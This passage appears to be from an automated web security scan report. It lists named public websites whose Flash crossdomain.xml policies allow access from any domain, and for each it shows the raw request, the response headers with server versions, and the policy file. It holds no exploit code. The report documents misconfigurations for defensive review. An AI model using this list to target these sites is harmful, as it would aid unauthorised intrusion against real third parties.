Date: Mon, 02 May 2011 00:28:23 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 01:30:36 GMT
ETag: "23102f-111-49d61be3e8700"
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
   <allow-h
...[SNIP]...

8.42. http://www.banner.kiev.ua/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.banner.kiev.ua
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.banner.kiev.ua

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 01 May 2011 23:16:20 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 203
Last-Modified: Fri, 28 Nov 2008 12:59:15 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

8.43. http://www.bigrebelgames.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigrebelgames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bigrebelgames.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:58 GMT
Server: Apache
Last-Modified: Thu, 08 Apr 2010 15:07:04 GMT
ETag: "10a-4bbdf118"
Accept-Ranges: bytes
Content-Length: 266
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

8.44. http://www.bonhams.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bonhams.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bonhams.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:31 GMT
Server: Apache
Last-Modified: Wed, 24 Feb 2010 15:57:30 GMT
ETag: "29fd-ca-4805ab93c6e80"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Content-Type: text/xml
Expires: Sun, 01 May 2011 23:31:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

8.45. http://www.cbs8.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs8.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbs8.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS29
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:ac8"
Cteonnt-Length: 208
Expires: Mon, 02 May 2011 00:40:25 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 00:40:25 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

8.46. http://www.express.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.express.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.express.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:44 GMT
Server: Apache
Last-Modified: Mon, 27 Apr 2009 17:01:16 GMT
ETag: "641b0-1ff-4688c4b5def00"
Accept-Ranges: bytes
Content-Length: 511
MS-Author-Via: DAV
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.netro42.com" />
<allow-access-from domain="*.netro42.net" />
<allow-access-from domain="*.dailyexpress.co.uk" />
<allow-access-from domain="*.express.co.uk" />
<allow-access-from domain="*.scottishdailyexpress.co.uk" />
<allow-access-from domain="*express.co.uk" />
<allow-access-from domain="*" />
...[SNIP]...

8.47. http://www.foxytube.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxytube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foxytube.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:42 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Fri, 04 Dec 2009 19:53:36 GMT
ETag: "2e008f1-92-479ec769bb000"
Accept-Ranges: bytes
Content-Length: 146
Connection: close
Content-Type: application/xml
Set-Cookie: RNLBSERVERID=ded691; path=/
Cache-control: private

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.48. http://www.freemooviesonline.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freemooviesonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.freemooviesonline.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
Last-Modified: Thu, 03 Jun 2010 12:56:46 GMT
ETag: "314040-cb-4881fbd2c3f80"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

8.49. http://www.fulltiltpoker.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulltiltpoker.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fulltiltpoker.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:44 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Thu, 20 Jan 2011 11:11:28 GMT
Accept-Ranges: bytes
Content-Length: 77
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

8.50. http://www.goodtoknow.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.goodtoknow.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goodtoknow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Apr 2011 08:28:48 GMT
ETag: "1c90d62-71-4a0dcb6dc9000"
Accept-Ranges: bytes
Content-Length: 113
Content-Type: text/xml
Date: Mon, 02 May 2011 00:18:20 GMT
Connection: close
Set-Cookie: browsertype=web; expires=Tue, 03-May-2011 00:18:20 GMT; path=/; domain=.goodtoknow.co.uk

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


8.51. http://www.healthination.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthination.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.healthination.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 01 May 2011 23:56:04 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 17 Feb 2009 16:22:47 GMT
Content-Length: 221
Cache-Control: max-age=4200
Expires: Mon, 02 May 2011 01:06:04 GMT
Accept-Ranges: bytes

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
<
...[SNIP]...

8.52. http://www.hyperlaunch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hyperlaunch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hyperlaunch.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:10 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Thu, 04 Dec 2008 13:37:45 GMT
ETag: "a70756-d8-aa62dc40"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross
...[SNIP]...

8.53. http://www.jacksonnewspapers.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jacksonnewspapers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jacksonnewspapers.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:16:27 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.ghm.zope.net
X-Cache: MISS from cache5.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache5.ghm.zope.net:80 (squid)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.54. http://www.journalstandard.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.journalstandard.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.journalstandard.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:51 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
Age: 1173
X-Cache: HIT from parent3.ghm.zope.net
X-Cache: MISS from cache7.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache7.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.55. http://www.ksrevenue.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ksrevenue.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ksrevenue.org

Response

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/xml
Last-Modified: Fri, 04 Feb 2011 19:33:26 GMT
Accept-Ranges: bytes
ETag: "9b9ec65a2c4cb1:2206"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:21:51 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers
...[SNIP]...

8.56. http://www.mountaindew.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mountaindew.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mountaindew.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:16:58 GMT
Server: TMTS-ws
Last-Modified: Thu, 20 Sep 2007 23:44:48 GMT
ETag: "24224-6b-bd595c00"
Accept-Ranges: bytes
Content-Length: 107
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>


8.57. http://www.muschealth.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.muschealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.muschealth.com

Response

HTTP/1.1 200 OK
Content-Length: 205
Content-Type: text/xml
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=49938952;expires=Wed, 24-Apr-2041 00:39:41 GMT;path=/
Set-Cookie: CFTOKEN=24f830386923fdf2-AE257784-23AE-EC0F-204DD6AAFB81BEA9;expires=Wed, 24-Apr-2041 00:39:41 GMT;path=/
Set-Cookie: SESESSIONID=13AC370D1712A5A6B92C40F59746CAAD;path=/
Set-Cookie: SESESSIONCODE=F9A6A00645F11EA5F1298311F2DB3976;path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:39:41 GMT
Connection: keep-alive
Set-Cookie: NSC_tjuffyfd-fyu=ffffffff831fd44345525d5f4f58455e445a4a423660;expires=Mon, 02-May-2011 15:39:41 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

8.58. http://www.outdoorjp.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outdoorjp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.outdoorjp.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:01 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 12:39:01 GMT
ETag: "26c4b4c-8d-4cb6f9e5"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>

8.59. http://www.partyamerica.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.partyamerica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.partyamerica.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 28 Apr 2011 20:06:39 GMT
ETag: "cb-185891c0"
Accept-Ranges: bytes
Content-Length: 203
Content-Type: application/xml
Cache-Control: max-age=81032
Expires: Mon, 02 May 2011 22:12:44 GMT
Date: Sun, 01 May 2011 23:42:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

8.60. http://www.pisamba.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pisamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pisamba.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:16:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 02 Sep 2008 02:35:49 GMT
ETag: "65c0222-78-455e093e2eb40"
Accept-Ranges: bytes
Content-Length: 120
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

8.61. http://www.thebeatles.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thebeatles.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thebeatles.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:52:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 09 Sep 2009 11:59:16 GMT
ETag: "64804a-116-cfe84d00"
Accept-Ranges: bytes
Content-Length: 278
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

8.62. http://www.thefordstory.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefordstory.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thefordstory.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 12 Feb 2009 20:24:12 GMT
ETag: "469b4-e1-80db3300"
Accept-Ranges: bytes
Content-Length: 225
Content-Type: text/xml
Date: Sun, 01 May 2011 23:53:29 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
...[SNIP]...

8.63. http://www.thehothits.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehothits.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thehothits.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:26:08 GMT
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.3
Content-Type: application/xml
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="take40.com"/>
...[SNIP]...
<allow-access-from domain="*.take40.com"/>
...[SNIP]...
<allow-access-from domain="test.offer.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="thehothits.com"/>
...[SNIP]...
<allow-access-from domain="*.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="mcmentertainment.com"/>
...[SNIP]...
<allow-access-from domain="*.mcmentertainment.com"/>
...[SNIP]...
<allow-access-from domain="mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="*.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="legioninteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.legioninteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="finishjob.com"/>
...[SNIP]...
<allow-access-from domain="*.finishjob.com"/>
...[SNIP]...
<allow-access-from domain="acnecanbecured.com.au"/>
...[SNIP]...
<allow-access-from domain="*.acnecanbecured.com.au"/>
...[SNIP]...
<allow-access-from domain="monsterhousecompetition.com.au"/>
...[SNIP]...
<allow-access-from domain="*.monsterhousecompetition.com.au"/>
...[SNIP]...
<allow-access-from domain="getintothegroove.com.au"/>
...[SNIP]...
<allow-access-from domain="*.getintothegroove.com.au"/>
...[SNIP]...
<allow-access-from domain="optus.com.au"/>
...[SNIP]...
<allow-access-from domain="*.optus.com.au"/>
...[SNIP]...
<allow-access-from domain="cornetto.com.au"/>
...[SNIP]...
<allow-access-from domain="*.cornetto.com.au"/>
...[SNIP]...
<allow-access-from domain="noboringbits.com"/>
...[SNIP]...
<allow-access-from domain="*.noboringbits.com"/>
...[SNIP]...
<allow-access-from domain="noboringbits.com.au"/>
...[SNIP]...
<allow-access-from domain="*.noboringbits.com.au"/>
...[SNIP]...
<allow-access-from domain="noboringbits.co.nz"/>
...[SNIP]...
<allow-access-from domain="*.noboringbits.co.nz"/>
...[SNIP]...
<allow-access-from domain="partystarters.net.au"/>
...[SNIP]...
<allow-access-from domain="*.partystarters.net.au"/>
...[SNIP]...
<allow-access-from domain="*.offer.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="offer.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="offer.preview.take40.com"/>
...[SNIP]...
<allow-access-from domain="*.offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="preview.offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="*.offer.planetrockevolution.com"/>
...[SNIP]...
<allow-access-from domain="offer.planetrockevolution.com"/>
...[SNIP]...
<allow-access-from domain="preview.offer.planetrockevolution.com"/>
...[SNIP]...
<allow-access-from domain="*.planetrockevolution.com"/>
...[SNIP]...
<allow-access-from domain="planetrockevolution.com"/>
...[SNIP]...
<allow-access-from domain="preview.offer.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="*.boostfreenights.com.au"/>
...[SNIP]...
<allow-access-from domain="syndplayer.take40.com"/>
...[SNIP]...
<allow-access-from domain="syndplayer.take40.com"/>
...[SNIP]...
<allow-access-from domain="*.famousfirstjobs.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="staging.famousfirstjobs.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="staging.take40.com"/>
...[SNIP]...
<allow-access-from domain="freedomwriters.take40.com"/>
...[SNIP]...
<allow-access-from domain="test.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="test.offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="services.legioninteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="staging.livelounge.com.au"/>
...[SNIP]...
<allow-access-from domain="www.livelounge.com.au"/>
...[SNIP]...
<allow-access-from domain="ad.take40.com"/>
...[SNIP]...
<allow-access-from domain="*.mcmstudios.com.au"/>
...[SNIP]...
<allow-access-from domain="mcmstudios.com.au"/>
...[SNIP]...
<allow-access-from domain="videoezy.take40.com"/>
...[SNIP]...
<allow-access-from domain="www.videoezy.take40.com"/>
...[SNIP]...
<allow-access-from domain="offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="preview.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="preview.offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="preview.offer.take40.com"/>
...[SNIP]...
<allow-access-from domain="preview.take40.com"/>
...[SNIP]...
<allow-access-from domain="www.take40.com"/>
...[SNIP]...
<allow-access-from domain="bbowes.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="hippo.dev.areeba.com.au"/>
...[SNIP]...
<allow-access-from domain="www.hippo.com.au"/>
...[SNIP]...
<allow-access-from domain="www.googleadservices.com"/>
...[SNIP]...
<allow-access-from domain="*.liveatthechapel.com"/>
...[SNIP]...
<allow-access-from domain="anikolov.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="archive.liveatthechapel.com"/>
...[SNIP]...
<allow-access-from domain="*.staging.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="*.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="offer.take40.com"/>
...[SNIP]...
<allow-access-from domain="*.xmaswishlist.com.au"/>
...[SNIP]...
<allow-access-from domain="*.condoms.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="*.christmaswishlist.com.au "/>
...[SNIP]...
<allow-access-from domain="staging.jonathancolemanexperience.com"/>
...[SNIP]...
<allow-access-from domain="www.jonathancolemanexperience.com"/>
...[SNIP]...
<allow-access-from domain="jonathancolemanexperience.com"/>
...[SNIP]...
<allow-access-from domain="www.legendsofrock.com.au"/>
...[SNIP]...
<allow-access-from domain="staging.legendsofrock.com.au"/>
...[SNIP]...
<allow-access-from domain="offer.planetrock.com.au"/>
...[SNIP]...
<allow-access-from domain="*.planetrock.com.au"/>
...[SNIP]...
<allow-access-from domain="www.planetrock.com.au"/>
...[SNIP]...
<allow-access-from domain="preview.planetrock.com.au"/>
...[SNIP]...
<allow-access-from domain="test.planetrock.com.au"/>
...[SNIP]...
<allow-access-from domain="*.myspace.com"/>
...[SNIP]...
<allow-access-from domain="www.myspace.com"/>
...[SNIP]...
<allow-access-from domain="facebook.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="staging.facebook.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="*.liveatthechapel.com.au"/>
...[SNIP]...
<allow-access-from domain="local.take40.com"/>
...[SNIP]...
<allow-access-from domain="ds.serving-sys.com"/>
...[SNIP]...
<allow-access-from domain="bs.serving-sys.com"/>
...[SNIP]...
<allow-access-from domain="dev.take40.com"/>
...[SNIP]...
